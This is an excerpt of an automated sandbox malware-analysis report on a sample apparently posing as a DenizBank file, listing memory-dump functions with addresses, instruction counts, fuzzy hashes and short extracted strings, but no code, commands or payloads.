Opcode Fuzzy Hash: 8f3b2bc6d4eae6d6c671bb7332ba9246d09c8a38a1cafa21c29e1fecdd866a81
Instruction Fuzzy Hash: 3C01A771008340DAE7204B25CD84767BFA8FF59726F18C56AED194A296C3799848C671

Function 00A5D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1797713219.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a5d000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa6c80ea4e442bf04e5ef9199d910d6e627de0d323f32673a8b3d17c6c199953
Instruction ID: e48d08579988997310704db5335b470565561a5fc4862b8ed1b5f00f5027351c
Opcode Fuzzy Hash: fa6c80ea4e442bf04e5ef9199d910d6e627de0d323f32673a8b3d17c6c199953
Instruction Fuzzy Hash: BDF062714043449EE7208B16DD84B66FFA8FF55725F18C45AED084E296C3799844CAB1

Function 0AA70660 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1804557828.000000000AA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa70000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed9314aabbca1e6ae72aa59cd02faf62b129a8f1b070d637adeb01b75c409c3d
Instruction ID: 29715feebdac87d046d9f927bf31cde1539d6c5a7a40d36c7fc6a8098c298372
Opcode Fuzzy Hash: ed9314aabbca1e6ae72aa59cd02faf62b129a8f1b070d637adeb01b75c409c3d
Instruction Fuzzy Hash: 2BE09271A4A144DFCB11CFF4A9156EEBBF4EF46300F0589EBD404871D1DA714A558F82

Function 0AA70670 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1804557828.000000000AA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa70000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb5c411a8a29379b55f8b591034834b4d4940192291e7516a5ebdd9e3b605ce5
Instruction ID: 74887398d2b1c4e4081ed36ee04785e3f29766775ff9a8be04570c774d217de0
Opcode Fuzzy Hash: eb5c411a8a29379b55f8b591034834b4d4940192291e7516a5ebdd9e3b605ce5
Instruction Fuzzy Hash: 96E0C270A4510CEFCB00DFF498049EFFBF8DF49200F0054A5A40583290EE719B109F81

Non-executed Functions

Function 07239510 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80c064fea5f0b42e386d7d02e329cdb4601ef756ca40fa08137e5b64d7b28cb9
Instruction ID: 834193c0e9f6b94a9dcf4e392b5486128b73c5d3fca3edd42c75dfb6e9944957
Opcode Fuzzy Hash: 80c064fea5f0b42e386d7d02e329cdb4601ef756ca40fa08137e5b64d7b28cb9
Instruction Fuzzy Hash: 4EE10BB4E101198FDB14DFA9C5809AEFBF6BF89304F24C169E854AB359D770A981CF60

Function 0723B020 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3411dec687e265a9edab3cbc388df68dfc5f7ea616b779f27533407d6ff2372d
Instruction ID: 3df82278bb13192ef403cf52a6e63cf53130959c6152e62dea64bfb9c3ff1330
Opcode Fuzzy Hash: 3411dec687e265a9edab3cbc388df68dfc5f7ea616b779f27533407d6ff2372d
Instruction Fuzzy Hash: E2E1EBF4E105598FDB54DFA9C5809AEFBB2FF89304F248169E818AB359D730A941CF60

Function 072390D8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8612842701c1ad7d0f1b71caec4534629181c13595b001f66fe35238397fc875
Instruction ID: a9b7950042ead6929e95ccaa179c10e9bd275a1c61a546c6950fe889991db20b
Opcode Fuzzy Hash: 8612842701c1ad7d0f1b71caec4534629181c13595b001f66fe35238397fc875
Instruction Fuzzy Hash: 39E11BB4E105198FDB14DFA9C5809AEFBB2FF89304F24C159E854AB35AD770A981CF60

Function 0723ABE8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8fc75cdc133b0dd8e43156ddbe68566b511c1e862a80017eeb9524f85bdb0e6
Instruction ID: 76b596873c1b761d5e7e31d13425a2bb69e65624598f20aba0703d397327683b
Opcode Fuzzy Hash: b8fc75cdc133b0dd8e43156ddbe68566b511c1e862a80017eeb9524f85bdb0e6
Instruction Fuzzy Hash: B3E10CB4E101198FDB54DFA9C5809AEFBB2FF89304F24C16AE854AB359D731A941CF60

Function 07239948 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93f4e028a3233512cfea28b72aa1d0edd8e7fd4bbbdc7ecfc1933a1cd0655d27
Instruction ID: 402a08fa02f2bb2dab7fe90df1576811c7e783dfa86153706c5eda8d5ef2cc38
Opcode Fuzzy Hash: 93f4e028a3233512cfea28b72aa1d0edd8e7fd4bbbdc7ecfc1933a1cd0655d27
Instruction Fuzzy Hash: 62E1FBB4E101198FDB14DFA9C5809AEFBB2FF49304F248169E859A7359D770A981CF60

Function 07230559 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c92ddc06aac91ad3dbdf2b4a066e1cb8b6687ac5fdc8af73d9015a5dad8e7818
Instruction ID: da2cbb1413feed42cf1a5d6892e7a24fc46c4cb033b890999cb91be9f9071331
Opcode Fuzzy Hash: c92ddc06aac91ad3dbdf2b4a066e1cb8b6687ac5fdc8af73d9015a5dad8e7818
Instruction Fuzzy Hash: 5BD1E731920A5A8ACB11EB64D99469DF771FFD5300F60C79AE40937265EF70AAC8CF80

Function 00E7D344 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798937817.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25bb03b4675f72b615026c77770d3b9befd24bd0a3b654525895e9bcaadeaafb
Instruction ID: c8b40990ebe6ca672681174ab18d98a893e3f5e1970c2ae1e19118747c3b5867
Opcode Fuzzy Hash: 25bb03b4675f72b615026c77770d3b9befd24bd0a3b654525895e9bcaadeaafb
Instruction Fuzzy Hash: 32A15B32A102098FCF09DFB5C84059EB7B2FF85304B15957AE909BB266EB71E906CB40

Function 07230560 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33eb2e1b066ef5558ce4ee19f0b17d31d9b862a8606cf4370d8e6e34408492b4
Instruction ID: 5e8185f6cdc3a0c12854c71383e1e7b9d05fa7c0aa83f94a0b4d5a73ffb982dc
Opcode Fuzzy Hash: 33eb2e1b066ef5558ce4ee19f0b17d31d9b862a8606cf4370d8e6e34408492b4
Instruction Fuzzy Hash: DCD1E635920A5A8ACB15EB64D99069DF771FFD5300F60C79AE40937265EF70AAC8CF80

Function 072390B8 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44da5122bdbe2b6adff83c642b25697c91830a50ab867d5931fbb99b2bc9af7b
Instruction ID: faea8ba68b2211197ecf3be9509df1258d5bda5574ceda26081bc3983e7a557a
Opcode Fuzzy Hash: 44da5122bdbe2b6adff83c642b25697c91830a50ab867d5931fbb99b2bc9af7b
Instruction Fuzzy Hash: F2516FB4E142198FDB14CFA9C5805AEFBF6BF89304F24C1AAD458A7356D730A941CFA0

Function 0723B010 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b575865fd69d408d84000a45db5eff60f051c0d1fe88d5486e926266525696
Instruction ID: ab5382ba00640812286fd07857d4d013632d3d5bf0f2391f18bd3f9a2f247035
Opcode Fuzzy Hash: b4b575865fd69d408d84000a45db5eff60f051c0d1fe88d5486e926266525696
Instruction Fuzzy Hash: 5B51FEB4E106198FDB14CFA9C9805AEFBB6FF89304F24C16AD458AB356D730A941CF61

Function 07239500 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30eb1975d3dc8ad7356081c3b3a9b895fdec0a6a780b81b2da4c65238d1e3871
Instruction ID: 8bda97b4909c3f3a2b6c5c0a75be4801f54968d834a67b37c6fcd3275d460692
Opcode Fuzzy Hash: 30eb1975d3dc8ad7356081c3b3a9b895fdec0a6a780b81b2da4c65238d1e3871
Instruction Fuzzy Hash: F0511DB4E112198FDB14DFA9C5805AEFBB6BF89304F24C1AAD458A7316D730A941CF61

Function 07239938 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20d2e9394cb824a23739041222bb4792639dc8d8e42ce498bcd61a280d9c957
Instruction ID: d87549dbc00831cef45e4b2930daed4790c2acb29cf1382212e5ee5a7c7c6f57
Opcode Fuzzy Hash: e20d2e9394cb824a23739041222bb4792639dc8d8e42ce498bcd61a280d9c957
Instruction Fuzzy Hash: 82510AB4E106198BDB14CFA9C5805AEFBF6FF89304F24C2AAD458A7315D770A941CFA1

Function 0723D8E0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0efdf380126483d5abace3731d794887eee7e72e84f8d8ba2c9eeddc667db32
Instruction ID: 1d554f2ba1ea8a59c8f85674be547b63487b0089171615475db8c49038e5e8ce
Opcode Fuzzy Hash: a0efdf380126483d5abace3731d794887eee7e72e84f8d8ba2c9eeddc667db32
Instruction Fuzzy Hash: C721FBB5E186288BEB18CF6B99043DDB7F6ABC9300F14C1BAC41CA6214DB7406868F10

Function 0723D8B8 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f872aa10f6d963c92652815828c3c5971afe79e59f46565dec59cce5959e1bd3
Instruction ID: 1a867302213156240d144fa6c08c32eb18496e9e19db95118cbfb07b162cd61a
Opcode Fuzzy Hash: f872aa10f6d963c92652815828c3c5971afe79e59f46565dec59cce5959e1bd3
Instruction Fuzzy Hash: 1231FFF1E296588BEB58CFAB99043D9BBF6AFC9310F04C1AAD00CA6255DB740586CF11

Analysis Process: denizbank 25.11.2024 E80 aspc.exePID: 7656, Parent PID: 7416COMMON

Execution Graph

Execution Coverage:	17.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	11.9%
Total number of Nodes:	42
Total number of Limit Nodes:	7

Executed Functions

Function 011A6FC8 Relevance: 6.7, Strings: 5, Instructions: 463
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(okq, xrefs: 011A7212
(okq, xrefs: 011A7220
(okq, xrefs: 011A753D
,oq, xrefs: 011A7298
,oq, xrefs: 011A728A

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: (okq$(okq$(okq$,oq$,oq
API String ID: 0-3760967313
Opcode ID: d679bbc748801e862bfff3cc7b3ef5c2ff09499047a25980884e26b68578da47
Instruction ID: 1f92b807ead559c4ad6c68c19cf86bccbb786c728b49761574a6d7a993ade109
Opcode Fuzzy Hash: d679bbc748801e862bfff3cc7b3ef5c2ff09499047a25980884e26b68578da47
Instruction Fuzzy Hash: 0B127075A00205CFCB19CF68C884AAEBFF6FF89310F958469E8059B2A1D732DE41CB51

Function 011AC146 Relevance: 6.5, Strings: 5, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oNp, xrefs: 011AC20A
LjNp, xrefs: 011AC377
LjNp, xrefs: 011AC38D
PHkq, xrefs: 011AC400
PHkq, xrefs: 011AC3EF

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 40f5d657e117ab7fd299001554583dcbb49bbd407e964984d10984894b11268e
Instruction ID: 5150627ca7d5dec4e401fd864215b8b791babb8185b9edb4b7ce52be26a7fbb9
Opcode Fuzzy Hash: 40f5d657e117ab7fd299001554583dcbb49bbd407e964984d10984894b11268e
Instruction Fuzzy Hash: 86A10674E00218DFDB18CFA9D884A9DBFF2BF89300F55806AE409AB365DB31A941CF50

Function 011AC468 Relevance: 6.4, Strings: 5, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oNp, xrefs: 011AC4DA
PHkq, xrefs: 011AC6BF
LjNp, xrefs: 011AC647
LjNp, xrefs: 011AC65D
PHkq, xrefs: 011AC6D0

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: db68b5597c4bc5641f00c516ccca2fe42182798eaaee7fd7819dc100c4ceb7d6
Instruction ID: c953aead2b110619955d4674a53e496d12770505fdd45c04ca167b3809b0663b
Opcode Fuzzy Hash: db68b5597c4bc5641f00c516ccca2fe42182798eaaee7fd7819dc100c4ceb7d6
Instruction Fuzzy Hash: 3591B274E00218CFDB18DFAAD984A9DBBF2BF88300F54D06AE419AB365DB359941CF51

Function 011A5362 Relevance: 6.4, Strings: 5, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHkq, xrefs: 011A55D9
0oNp, xrefs: 011A53E2
LjNp, xrefs: 011A5550
PHkq, xrefs: 011A55C8
LjNp, xrefs: 011A5566

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: fc579fad44aa1c386cfc96b41f2a9e3323f582b6ce40dd8ce19b1a413cebcee5
Instruction ID: 3113079318468c7bde2a2a86b9ffbd60e66ead554fcb639a443d09912964723a
Opcode Fuzzy Hash: fc579fad44aa1c386cfc96b41f2a9e3323f582b6ce40dd8ce19b1a413cebcee5
Instruction Fuzzy Hash: 1791D274E04208CFDB58CFAAD884A9DBFF2BF89300F558069E849AB365DB359945CF10

Function 011AD278 Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oNp, xrefs: 011AD2EA
PHkq, xrefs: 011AD4CF
PHkq, xrefs: 011AD4E0
LjNp, xrefs: 011AD46D
LjNp, xrefs: 011AD457

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: b0639d28397623994133d5f7ebe0f41951d9ae5eb5b4dcd21a8397690e5cad62
Instruction ID: e360d7ac821247e677472eb0c2cc582480d47fd9d21ac492cd83a3fcc54b1a11
Opcode Fuzzy Hash: b0639d28397623994133d5f7ebe0f41951d9ae5eb5b4dcd21a8397690e5cad62
Instruction Fuzzy Hash: C581B374E00618CFDB18DFAAD984A9DBBF2BF89300F54C069E409AB765DB34A945CF10

Function 011ACA08 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjNp, xrefs: 011ACBE7
PHkq, xrefs: 011ACC70
PHkq, xrefs: 011ACC5F
0oNp, xrefs: 011ACA7A
LjNp, xrefs: 011ACBFD

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: aeb87040fbee18a331403f1bc82706ddd1e79c38fb8831084366b2c7d0943d69
Instruction ID: 0f1144647521ce22800d6a2fe62f387ceebdd5251f8c20a32d40563925628800
Opcode Fuzzy Hash: aeb87040fbee18a331403f1bc82706ddd1e79c38fb8831084366b2c7d0943d69
Instruction Fuzzy Hash: 5281C274E00218CFDB18DFAAD884A9DBBF2BF89300F54C069E419AB365DB359941CF50

Function 011ACCD8 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHkq, xrefs: 011ACF40
LjNp, xrefs: 011ACECD
LjNp, xrefs: 011ACEB7
PHkq, xrefs: 011ACF2F
0oNp, xrefs: 011ACD4A

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: ec8c1793b383ff9b5da67230687fa4130623ba24794c14cf197900a51eba6592
Instruction ID: e52b39a5b3d9bb3c822e5cc7d71db7b85f998b96ea4116c1fb82e2de0e12a433
Opcode Fuzzy Hash: ec8c1793b383ff9b5da67230687fa4130623ba24794c14cf197900a51eba6592
Instruction Fuzzy Hash: B981BF74E00218DFDB18DFAAD884A9DBFF2BF89300F548069E409AB265DB349981CF51

Function 011AC738 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjNp, xrefs: 011AC92D
PHkq, xrefs: 011AC9A0
0oNp, xrefs: 011AC7AA
PHkq, xrefs: 011AC98F
LjNp, xrefs: 011AC917

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 8076adf8872ea80778d3369cd598344ce649bbfe9dcee557880171ce24895d2f
Instruction ID: 271712280cce6642c597e298f7d5d8eb88249110bd4c7927e500c2b7888958bc
Opcode Fuzzy Hash: 8076adf8872ea80778d3369cd598344ce649bbfe9dcee557880171ce24895d2f
Instruction Fuzzy Hash: C781A174E00218DFDB58DFAAD984A9DBBF2BF88300F54C069E419AB365EB349941CF50

Function 011ACFA9 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjNp, xrefs: 011AD19D
0oNp, xrefs: 011AD01A
PHkq, xrefs: 011AD210
LjNp, xrefs: 011AD187
PHkq, xrefs: 011AD1FF

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 1833770cedd92bdac91dd7a7c87e9a9c0af426f95a1e6cbac5588bfc7e4a1e20
Instruction ID: 2012f2ebd4bf5a5d5857f2de7f97d3b418f9991cc65dc3e1f89d06a1180aee56
Opcode Fuzzy Hash: 1833770cedd92bdac91dd7a7c87e9a9c0af426f95a1e6cbac5588bfc7e4a1e20
Instruction Fuzzy Hash: CF81B374E00618CFDB58DFAAD984A9DBBF2BF88300F14C069E409AB365DB349941CF11

Function 011A9DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON

Download Yara Rule

Strings

(okq, xrefs: 011AA518
4'kq, xrefs: 011A9E04
4'kq, xrefs: 011AAB13
4'kq, xrefs: 011A9F0C

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: (okq$4'kq$4'kq$4'kq
API String ID: 0-323808577
Opcode ID: f3a586d27e9d04eb0bfbb4a0071767f961577de3f04ed6e4d484c72da94ec46e
Instruction ID: ea05511c2fdbc680ee3a8d256bee595608108722a65ec1ee0d7772e298bfee38
Opcode Fuzzy Hash: f3a586d27e9d04eb0bfbb4a0071767f961577de3f04ed6e4d484c72da94ec46e
Instruction Fuzzy Hash: 1EA28E38A002098FCB19CF68D594AAEBFF2FF89300F558569E505DB2A6D731ED81CB51

Function 011A29EC Relevance: 5.5, Strings: 4, Instructions: 489
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xoq, xrefs: 011A2AD8
Xoq, xrefs: 011A2A9E
Xoq, xrefs: 011A2B57
Xoq, xrefs: 011A2BA4

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: Xoq$Xoq$Xoq$Xoq
API String ID: 0-1961338500
Opcode ID: b53ddb037390035558e090a6823681d0460d59a0b7183dea7c7a672d22d239b7
Instruction ID: 92d0aeb04eb1f0553ac0fa24a0075f38dab6fe3eb0c8d32f3f01aa92fea97ece
Opcode Fuzzy Hash: b53ddb037390035558e090a6823681d0460d59a0b7183dea7c7a672d22d239b7
Instruction Fuzzy Hash: D9021436A083D58FC7AB8F3884612A6BF70EF07614F584EEDC4C14A563DB35594ACB91

Function 011A69A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

(okq, xrefs: 011A6EDA
Hoq, xrefs: 011A6DA6

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: (okq$Hoq
API String ID: 0-4134915641
Opcode ID: c27c5b5a5bfda29d974e62fa6d44e55993bdb94f5c080cf4c987076226a97acc
Instruction ID: 602b777d65b9a912dab3b43503c6f008fa384a29bcb7292e73d05afbe58e8f4c
Opcode Fuzzy Hash: c27c5b5a5bfda29d974e62fa6d44e55993bdb94f5c080cf4c987076226a97acc
Instruction Fuzzy Hash: 01129B74A002198FDB19DF69C854AAEBFB6FF88300F648569E845DB3A5DB30DD41CB81

Function 011A3AA1 Relevance: 2.8, Strings: 2, Instructions: 308COMMON

Download Yara Rule

Strings

Xoq, xrefs: 011A3CCD
Xoq, xrefs: 011A3CF6

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: Xoq$Xoq
API String ID: 0-251439590
Opcode ID: 9fae21f4388d853518f4857568ec326c444c7fdc5601fa1a9a75c41e1b02aba8
Instruction ID: 41541c6947bf9d6c2b1441eecfbeb3f61546c755f136db840655c74c708f3efd
Opcode Fuzzy Hash: 9fae21f4388d853518f4857568ec326c444c7fdc5601fa1a9a75c41e1b02aba8
Instruction Fuzzy Hash: 03A1A1366597D18FC76B4F38C8A22A6BF71FF4322478C04DDD8C28E256C6399849D792

Function 011A3E09 Relevance: 2.8, Strings: 2, Instructions: 267COMMON

Download Yara Rule

Strings

$kq, xrefs: 011A3E2E
Xoq, xrefs: 011A3E47

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: Xoq$$kq
API String ID: 0-227003152
Opcode ID: 6846bc5faa9b6ec1d1c38e0ee315c36dafb38bfb3b07040201d7a4e8171b6d51
Instruction ID: d0709479b792e9a24275c559802c63ff57129cc8b2efdb714cc0bb71ad91421d
Opcode Fuzzy Hash: 6846bc5faa9b6ec1d1c38e0ee315c36dafb38bfb3b07040201d7a4e8171b6d51
Instruction Fuzzy Hash: F3919134B04319CBDB1CABB8955427EBFA7BFC8700B59852DE442E728DCF3588019786

Function 06A19548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4222737351.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6a10000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae5b30461efc2c1dd06e74ed3df4fe0ac987f58f2541e30b756d08a98381a0d
Instruction ID: a037dc3c65c124e7b32d902768057713d4134e23a26175d6952a29361bdf049f
Opcode Fuzzy Hash: 9ae5b30461efc2c1dd06e74ed3df4fe0ac987f58f2541e30b756d08a98381a0d
Instruction Fuzzy Hash: 69F1E374E01218CFDB54DFA9D994B9EFBB2BF88304F1481A9E808AB355DB709985CF50

Function 011AE988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

